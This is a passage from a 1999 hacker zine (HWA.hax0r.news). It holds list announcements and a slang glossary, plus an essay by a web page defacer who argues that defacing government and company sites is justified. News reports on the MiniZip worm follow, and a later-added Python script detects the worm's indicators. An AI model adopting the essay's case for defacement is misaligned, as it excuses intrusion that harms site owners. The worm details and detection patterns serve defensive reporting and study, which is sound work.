related books, papers and articles. Available to download directly
for our servers when possible.
* Tools. A large array of free security tools. Categorized and
available for download.
* News: A vast number of security news articles going all the way
back to 1995.
* Security Resources: A directory to other security resources on
the net.
As well as many other things such as an event calendar.
For your convenience the home-page can be personalized to display
only information you may be interested in. You can filter by
categories, keywords and operating systems, as well as configure
how much data to display.
I'd like to thank the fine folks at NETSPACE for hosting the
site for as long as they have. Their services have been invaluable.
I hope you find these changes for the best and the new services
useful. I invite you to visit http://www.securityfocus.com/ and
check it out for yourself. If you have any comments or suggestions
please feel free to contact me at this address or at
aleph1@securityfocus.com.
Cheers.
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--[ New ISN announcement (New!!)
Sender: ISN Mailing List <ISN@SECURITYFOCUS.COM>
From: mea culpa <jericho@DIMENSIONAL.COM>
Subject: Where has ISN been?
Comments: To: InfoSec News <isn@securityfocus.com>
To: ISN@SECURITYFOCUS.COM
It all starts long ago, on a network far away..
Not really. Several months ago the system that hosted the ISN mail list
was taken offline. Before that occurred, I was not able to retrieve the
subscriber list. Because of that, the list has been down for a while. I
opted to wait to get the list back rather than attempt to make everyone
resubscribe.
As you can see from the headers, ISN is now generously being hosted by
Security Focus [www.securityfocus.com]. They are providing the bandwidth,
machine, and listserv that runs the list now.
Hopefully, this message will find all ISN subscribers, help us weed out
dead addresses, and assure you the list is still here. If you have found
the list to be valuable in the past, please tell friends and associates
about the list. To subscribe, mail listserv@securityfocus.com with
"subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
As usual, comments and suggestions are welcome. I apologize for the down
time of the list. Hopefully it won't happen again. ;)
mea_culpa
www.attrition.org
--[ Old ISN welcome message
[Last updated on: Mon Nov 04 0:11:23 1998]
InfoSec News is a privately run, medium traffic list that caters
to distribution of information security news articles. These
articles will come from newspapers, magazines, online resources,
and more.
The subject line will always contain the title of the article, so that
you may quickly and efficiently filter past the articles of no interest.
This list will contain:
o Articles catering to security, hacking, firewalls, new security
encryption, products, public hacks, hoaxes, legislation affecting
these topics and more.
o Information on where to obtain articles in current magazines.
o Security Book reviews and information.
o Security conference/seminar information.
o New security product information.
o And anything else that comes to mind..
Feedback is encouraged. The list maintainers would like to hear what
you think of the list, what could use improving, and which parts
are "right on". Subscribers are also encouraged to submit articles
or URLs. If you submit an article, please send either the URL or
the article in ASCII text. Further, subscribers are encouraged to give
feedback on articles or stories, which may be posted to the list.
Please do NOT:
* subscribe vanity mail forwards to this list
* subscribe from 'free' mail addresses (ie: juno, hotmail)
* enable vacation messages while subscribed to mail lists
* subscribe from any account with a small quota
All of these generate messages to the list owner and make tracking
down dead accounts very difficult. I am currently receiving as many
as fifty returned mails a day. Any of the above are grounds for
being unsubscribed. You are welcome to resubscribe when you address
the issue(s).
Special thanks to the following for continued contribution:
William Knowles, Aleph One, Will Spencer, Jay Dyson,
Nicholas Brawn, Felix von Leitner, Phreak Moi and
other contributors.
ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/
ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
private list. Moderation of topics, member subscription, and
everything else about the list is solely at his discretion.
The ISN membership list is NOT available for sale or disclosure.
ISN is a non-profit list. Sponsors are only donating to cover bandwidth
and server costs.
Win2k Security Advice Mailing List (new added Nov 30th)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To subscribe:
send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body
to listserv@listserv.ntsecurity.net
Welcome to Win2K Security Advice! Thank you for subscribing. If you have any
questions or comments about the list please feel free to contact the list
moderator, Steve Manzuik, at steve@win2ksecadvice.net.
To see what you've missed recently on the list, or to research an item
of interest, be sure to visit the Web-based archives located at:
http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec
==============
NTSecurity.net brings the security community a brand new (Oct 99) and
much-requested Windows security mailing list. This new moderated mailing list,
Win2KSecAdvice (formerly NTSecAdvice), is geared towards promoting the open
discussion of Windows-related security issues.
With a firm and unwavering commitment towards timely full disclosure, this
new resource promises to become a great forum for open discussion
regarding security-related bugs, vulnerabilities, potential exploits, virus,
worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community
and we openly invite all security minded individuals, be they white hat,
gray hat, or black hat, to join the new mailing list.
While Win2KSecAdvice was named in the spirit of Microsoft's impending product
line name change, and meant to reflect the list's security focus both now and
in the long run, it is by no means limited to security topics centered around
Windows 2000. Any security issues that pertain to Windows-based networking are
relevant for discussion, including all Windows operating systems, MS Office,
MS BackOffice, and all related third party applications and hardware.
The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to
a security risk, it's relevant to the list.
The list archives are available on the Web at http://www.ntsecurity.net,
which include a List Charter and FAQ, as well as Web-based searchable list
archives for your research endeavors.
SAVE THIS INFO FOR YOUR REFERENCE:
To post to the list simply send your email to
win2ksecadvice@listserv.ntsecurity.net
To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to
listserv@listserv.ntsecurity.net
Regards,
Steve Manzuik, List Moderator
Win2K Security Advice
steve@win2ksecadvice.net
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
__ ___ ___
\ \ / / |__ ___ __ _ _ __ _____ ____|__ \
\ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ /
\ V V / | | | | (_) | (_| | | | __/\ V V / __/_|
\_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_)
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/programming/IRC+ man in black
sas2@usa.net .............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
twisted-pair@home.com......: currently active/programming/IRC+
Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media
Past Foreign Correspondents (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sla5h.............................: Croatia
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
Sla5h's email: smuddo@yahoo.com
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pigeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ ___ ___ _____ _ ___
| | | \ \ / / \ | ___/ \ / _ \
| |_| |\ \ /\ / / _ \ | |_ / _ \| | | |
| _ | \ V V / ___ \ _| _/ ___ \ |_| |
|_| |_| \_/\_/_/ \_(_)_|/_/ \_\__\_\
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal usage and use in this zine are
listed below: Some are very useful, others attempt to deny any possible
attempts at eschewing obfuscation by obscuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck, where the fuck, when the fuck etc ..
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _
/ ___|_ __ ___ ___| |_ ___
| | _| '__/ _ \/ _ \ __/ __|
| |_| | | | __/ __/ |_\__ \
\____|_| \___|\___|\__|___/
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix Vortexia Wyze1
Pneuma Raven Zym0t1c duro
Repluzer astral BHZ ScrewUp
Qubik gov-boi _Jeezus_ Haze_
thedeuce ytcracker
Folks from #hwa.hax0r.news and #fawkerz, #ninjachat and #sesame
Ken Williams/tattooman ex-of PacketStorm,
& Kevin Mitnick
kewl sites:
+ http://www.hack.co.za NEW
+ http://blacksun.box.sk NEW
+ http://packetstorm.securify.com/ NEW
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
Thanks to myself for providing the info from my wired news feed and others from whatever
sources, also to Spikeman for sending in past entries.... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Yeah we have a message board, feel free to use it, remember there are no stupid questions...
well there are but if you ask something really dumb we'll just laugh at ya, lets give the
message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org
domain comes back online (soon) meanwhile the beseen board is still up...
==============================================================================
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
int main(void)
{
    printf ("Read commented source!\n\n");
    /*
     * Short issue this week, I'm still sick <feh>
     * so haven't put as much time as I usually do
     * into digging up info and etc, hopefully be
     * back to normal next week...
     *
     */
    printf ("EoF.\n");
    return 0;
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/null nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
-= start =--= start =--= start =--= start =--= start =--= start =--= start
____ _ _
/ ___|___ _ __ | |_ ___ _ __ | |_
| | / _ \| '_ \| __/ _ \ '_ \| __|
| |__| (_) | | | | || __/ | | | |_
\____\___/|_| |_|\__\___|_| |_|\__|
/ ___|| |_ __ _ _ __| |_
\___ \| __/ _` | '__| __|
___) | || (_| | | | |_
|____/ \__\__,_|_| \__|
-= start =--= start =--= start =--= start =--= start =--= start =--=
03.0 Yes It Is (Worth It)
~~~~~~~~~~~~~~~~~~~~
contributed by ytcracker
Active web page defacer YTCracker has written an
article in response to Brian Martin's article Is It Worth
It, published by HNN last week. Mr Martin asked if the
recent spate of web page defacements was worth the
trouble it causes the perpetrators. YTCracker has
recently defaced such high profile pages as Bureau of
Land Management National Training Center and the
Defense Contracts Audit Agency. YTCracker now
explains the motivation and says that, Yes, it is worth
it.
Buffer Overflow
http://www.hackernews.com/orig/buffero.html
HNN Cracked Pages Archive - Some of YTCrackers work is displayed here.
http://www.hackernews.com/archive/crackarch.html
"Yes, it is."
A response to Brian Martin's Is it worth it? article.
By YTCracker (phed@felons.org)
This article was written in response to an article written
by Brian Martin concerning web page defacement, its
risks, and its consequences. He asks the eternal question
"Is it worth it?" to those who participate in these kinds of
activities. Many of the individuals I have talked to have
mixed thoughts about the article. Some individuals say it
really taught them something valuable. Some said it
scared them into considering quitting. Others, including
myself, carry a somewhat apathetic attitude toward the
whole thing in general. Allow me to explain.
A few things need to be established about this
defacement culture. One, I believe that this in no way
constitutes hacking. On any level, no matter how you
look at it, web page defacement is destructive. In some
cases, it can ruin the credibility of a company or a
government agency. Two, I believe that web page
defacement should carry a "message". When I spoke with
Brian earlier, I tried to make it clear that we [as third
person onlookers to a defacement] cannot determine this
message in some cases. To us, "hack0r x 0ens u in 9d9"
probably means nothing at all. To hack0r x, it may have.
However, I personally believe that if hack0r x is going to
break into this page and disrupt their message, his better
be worthwhile. Thirdly, I believe that there is a "whiter"
side to defacement. This side operates within definitive
ethical boundaries and attempts to make web page
cracking as non-malicious as possible.
I do my best to have the ability to define myself under
this ethical side. I back everything up. I leave the
administrator information on how to fix the security hole. I
don't disrupt the flow of information - I leave a link to the
original page in plain sight. While these factors don't
guarantee my immunity, they surely aren't raising any
eyebrows and leading people to contemplate my threat to
national security. I am not concerned with leaving
messages like "fuq da fedz in 9d9 suk0r my nutsaq." That,
frankly, is asking for trouble. It also serves no purpose.
Why do I do it? There are a few key reasons. I am sure
that everyone out there that contributes to this scene
has their own.
First off, I am seventeen [before I go any further, I am
referring to seventeen as "kid", not "a minor and therefore
will receive lesser penalty"]. As a young member of
society oftentimes I find that my voice goes unheard. In a
book titled Rise and Fall of the American Teen by Thomas
Hine [NPR broadcast] , the theory is presented that the
proverbial "teenager" did not exist until the 1930s. Until
that time, teenagers were too busy supporting the family,
getting married, and having children. Nowadays, if I were
to write my senator, correct my teacher, or start a
business, people automatically assume that I am
incapable. This is a stereotype that I have not established
for myself; other teenagers have given me a reputation
unbefitting of who I really am. By defacing a website,
people have to listen. The volume of people that visit the
site as it is defaced combined with the volume of people
that view it mirrored is immense. Therefore, I have
effectively gotten my message out, and people can
choose to listen to it or not.
If this sounds extremely selfish, I agree. The twist comes
in the questions that people ask themselves. For instance,
one of my motivations is enlightening system
administrators. There has been many a case where I have
noticed a vulnerability, mailed the admin, and his/her
cockiness resulted in ignoring my warning. Two or three
days later, I see this admin's page on the mirror.
Sometimes, the best way to inform someone is to show
them. Seeing is believing. The point is, if I can get at
least one of the hundred people that see that site,
including the administrator, to realize that security isn't all
its cracked up to be and change their views, I have done
my job. This line of thought is very common in the heads
of most defacement practitioners.
Second, I am a graffiti artist. I throw burners on walls and
trains. I have run with some infamous crews. I do not
represent the "tagging" aspect [for the uninitiated, the
equivalent of "b0n3r oenz u" on a defacement]. I strongly
feel that graffiti can be very artistic and carry a very
strong message if done correctly. People will pass by your
piece and either love it or hate it. For that moment they
take their mind off of their jobs, their children, their lives
and they contemplate what they are looking at. This is
very much so the purpose of web defacement in my eyes.
Third, I don't care. I can't care. I haven't been raided,
haven't stared down a lawman's gun, and haven't been
investigated for computer crime. If any of these were to
happen to me, I have no doubt in my mind I will see things
in a different light. This ignorance is obviously not very
healthy. I have weighed the consequences and see very
little in favor of me stopping. I will most likely continue to
deface until it gets old, I have nothing else to say, or
simply don't have time. I would argue that ninety percent
of web page defacements fall under this mindset. This is
sad, but true. This is not to say that I or anyone else isn't
aware of the rules. That assumption is far from the truth.
What it means is that we are basically carefree in the
sense that we could be arrested and still feel good about
ourselves. ;)
In a sense, it isn't worth it. There are only a few of us
singlehandedly cracking with good intentions. The rest of
the scene is too busy talking shit to each other or rm
-rfing everything they can that there is a stereotype
affiliated. As aforementioned, stereotypes are the ultimate
backpedal to anything we accomplish. Just as teenagers
are ignored and pigeonholed, everyone who totes a
computer and investigates security will be labeled a
threat.
What does make it worth it? Arguably, the few who carry
on the tradition. PHC and Narcissus - using their
defacements as a political tool. DHC - putting an
interesting poetic twist to their cracks. ULG - for making
BIG statements on BIG sites. Last but not least, v00d00 -
for his cynical views and unique style. There are others,
no doubt, but these guys definitely take the cake for
originality and style - they have my respect.
So next time you see my name or anyone else's pop up on
attrition and wonder why we do it, think back to this
article. Is it worth it?
You decide.
YTCracker(phed@felons.org)
(c)1999 YTCracker and seven one nine
@HWA
04.0 ExplorerZip Shrinks, Becomes MiniZip
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
By applying a simple compression scheme (Neolite) to
the well known destructive virus WormExplorer it is
possible to sneak the old worm by antivirus software.
This 'new' version of WormExplorer is being called
MiniZip. The worm uses MAPI-capable e-mail programs
to propagate, such as Microsoft Corp.'s Outlook,
Microsoft Corp.'s Outlook Express and Microsoft Corp.'s
Exchange. At least twenty companies and several
thousand systems have been infected so far. (It is
pretty sad that with today's technology a simple
compression routine is enough to bypass antivirus
technology. Pattern detection is not the answer. Sure
hope the AV companies have something better up their
sleeves.)
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2402114,00.html?chkpt=zdnntop
MSNBC
http://www.msnbc.com/news/341096.asp
Associated Press - via Baltimore Sun
http://www.sunspot.net/cgi-bin/gx.cgi/AppLogic+FTContentServer?section=cover&pagename=story&storyid=1150180206405
MiniZip a nasty, small clone of ExploreZip
New virus compresses ExploreZip code to
evade anti-virus software, bites at least a
dozen companies.
By Jim Kerstetter, PC Week
UPDATED December 1, 1999 9:04 AM PT
They call it, MiniZip.
Virus researchers at Network Associates Inc. (Nasdaq:
NETA), Symantec Corp. (Nasdaq: SYMC) and Trend
Micro Inc. warned Tuesday evening that a new version of
the ExploreZip virus, which wipes out information on a
hard drive, has hit at least 12 companies so far, six of
them high-tech manufacturing companies. Several
thousand PCs are believed to have been hit.
The ExploreZip variant, also called ExploreZip.worm.pak,
is 120KB, about half the size of its predecessor. But
other than its diminutive size, MiniZip acts exactly like
ExploreZip, which wipes out files on hard drives and
can spread via e-mail.
Compression conundrum
MiniZip is so small because the virus's author
compressed the original ExploreZip code. Compressing it
changes the bits, meaning that anti-virus software has
trouble identifying the new virus. MiniZip first appeared
last week, so most anti-virus makers have updated their
software to detect its code. While anti-virus makers
issued notice of the new updates, it appears that many
companies have not updated their anti-virus software,
allowing Tuesday's outbreak.
What to look for
ExploreZip, the "father" of MiniZip, was first reported on
June 11. To propagate, the worm uses MAPI-capable
e-mail programs, such as Microsoft Corp.'s Outlook,
Outlook Express and Exchange.
It e-mails itself out as an attachment with the filename
"zipped_files.exe." The body of the e-mail message looks like
it came from a regular e-mail correspondent and says:
"I received your email and I shall send you a reply ASAP.
Till then, take a look at the attached zipped docs."
Once it's launched, MiniZip launches the original
Worm.ExploreZip routine. It looks for any drives mapped
to the infected computer and spreads to them. It also
looks for unread e-mail and automatically replies to them,
in search of new victims.
"That's why it has spread so rapidly now, but didn't at first,"
said Vincent Weafer, director of the Symantec Antivirus
Research Center. "This is exactly how ExploreZip
spread."
MiniZip may display an error message informing the user
that the file is not a valid archive, according to the
anti-virus companies. The worm copies itself to the
c:\windows\system directory with the file name
"Explore.exe" and then modifies the WIN.INI file so that
the virus launches each time Windows is started.
Associated Press;
Computer virus devouring files
The Associated Press
SAN FRANCISCO (AP) Experts scrambled to warn thousands
of computer users that a familiar and damaging virus has struck
scores of companies and could be slumbering in their e-mail inboxes.
The Mini-Zip virus tore through computers on Tuesday, devouring
files and crippling e-mail systems, anti-virus analysts said. It was
expected to renew its assault today as unsuspecting users logged on.
Dan Schrader, vice president of new technology at Trend Micro in
Cupertino, Calif., said he fielded complaints of significant problems
from four Fortune 500 companies and scores of smaller companies.
Sal Viveros, a marketing manager for Santa Clara-based Network
Associates, which makes anti-virus software, said 20 large
corporations had been affected by Tuesday evening.
The experts refused to release the names of affected companies.
Mini-Zip's parent bug, Worm.Explore.Zip, struck last summer. It
was considered the most destructive virus since the Melissa outbreak
in the spring.
``The last time this virus came along it affected tens of thousands
maybe hundreds of thousands of computers and caused millions
of dollars in damage,'' Schrader said. ``It's malicious and
fast-spreading. We consider this to be high-risk.''
It wasn't clear whether the problem had been reported to the
government-chartered CERT Coordination Center formerly the
Computer Emergency Response Team at Carnegie Mellon
University in Pittsburgh. There were no warnings on its Web site
early today.
Anti-virus experts said the bug gets loose from an infected system as
a seemingly friendly reply to a clean e-mail sent via the Microsoft
Outlook, Outlook Express or Exchange browsers.
The virus intercepts the original message and automatically sends
itself as a response even changing the subject line from, for
example, ``Work Meeting'' to ``Re: Work Meeting.''
The body of the message reads: ``Hi (recipient's name)! I received
your e-mail and I shall send you an e-mail ASAP. Till then, take a
look at the attached zipped docs. bye.''
The e-mail contains an attachment called ``zippedfiles.exe.'' If a
user double-clicks on the attachment, the virus is set loose in the new
victim's system.
It then destroys a series of files in a computer's hard drive by
replacing them with empty files.
Anti-virus experts cautioned users against opening e-mails if they do
not know the sender or why they were sent. They said the virus
could be fought with updated anti-virus software.
Originally published on 12/01/1999
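The PC Week and AP pieces above list the same handful of indicators for this worm: the zipped_files.exe / zippedfiles.exe attachment, the canned "take a look at the attached zipped docs" body, the "Re:" auto-reply, a copy of Explore.exe in c:\windows\system and a WIN.INI change that launches it at startup. The script below is an added example (not code from the newsletter, the articles or any AV vendor) that turns those indicators into a simple check run over constructed sample data. It assumes the WIN.INI change is a run= or load= line in the [windows] section, which is the classic Windows 3.x/9x startup hook; the articles say only that WIN.INI is modified.

```python
"""Indicator checks for the MiniZip / ExploreZip worm as described in the
articles above. Added example; the message records and WIN.INI text are
constructed sample data, not captured from a real infection."""
import re
from typing import Dict, List

# Indicators named in the articles.
SUSPECT_ATTACHMENTS = {"zipped_files.exe", "zippedfiles.exe"}
BODY_MARKER = re.compile(r"take a look at the attached zipped docs", re.I)
# Dropped copy of the worm: c:\windows\system\Explore.exe (from the articles).
DROPPED_FILE = re.compile(r"c:\\windows\\system\\explore\.exe", re.I)


def check_message(msg: Dict[str, str]) -> List[str]:
    """Return the indicator names found in one e-mail record.

    msg is a constructed dict with keys subject, body and attachments
    (comma-separated file names), standing in for parsed mail headers."""
    hits: List[str] = []
    attachments = {a.strip().lower()
                   for a in msg.get("attachments", "").split(",") if a.strip()}
    if attachments & SUSPECT_ATTACHMENTS:
        hits.append("attachment-name")
    if BODY_MARKER.search(msg.get("body", "")):
        hits.append("body-text")
    # The worm answers unread mail, so its messages carry a "Re:" prefix.
    # On its own that proves nothing, so it only counts alongside another hit.
    if msg.get("subject", "").lower().startswith("re:") and hits:
        hits.append("auto-reply-subject")
    return hits


def check_win_ini(ini_text: str) -> List[str]:
    """Return run=/load= lines in the [windows] section that start Explore.exe.

    Assumption (not stated in the articles): the startup hook is a run= or
    load= entry under [windows]; entries in other sections are ignored."""
    findings: List[str] = []
    in_windows = False
    for line in ini_text.splitlines():
        stripped = line.strip()
        if stripped.startswith("[") and stripped.endswith("]"):
            in_windows = stripped.lower() == "[windows]"
            continue
        if (in_windows
                and re.match(r"(run|load)\s*=", stripped, re.I)
                and DROPPED_FILE.search(stripped)):
            findings.append(stripped)
    return findings


def scan_mailbox(messages: List[Dict[str, str]]) -> List[int]:
    """Return the indices of messages that match at least one indicator."""
    return [i for i, m in enumerate(messages) if check_message(m)]


# Constructed sample data: one worm-style reply and one ordinary reply.
SAMPLE_MESSAGES = [
    {"subject": "Re: Work Meeting",
     "body": "Hi Pat! I received your email and I shall send you a reply "
             "ASAP. Till then, take a look at the attached zipped docs. bye.",
     "attachments": "zipped_files.exe"},
    {"subject": "Re: Budget",
     "body": "Numbers attached, let me know if anything looks off.",
     "attachments": "budget.xls"},
]

# Constructed WIN.INI fragment with the startup hook added (assumed form).
SAMPLE_WIN_INI = r"""[windows]
load=
run=C:\WINDOWS\SYSTEM\Explore.exe
NullPort=None
[Desktop]
Wallpaper=(None)
"""

if __name__ == "__main__":
    for i in scan_mailbox(SAMPLE_MESSAGES):
        print(f"message {i}: {', '.join(check_message(SAMPLE_MESSAGES[i]))}")
    for line in check_win_ini(SAMPLE_WIN_INI):
        print(f"WIN.INI startup hook: {line}")
```

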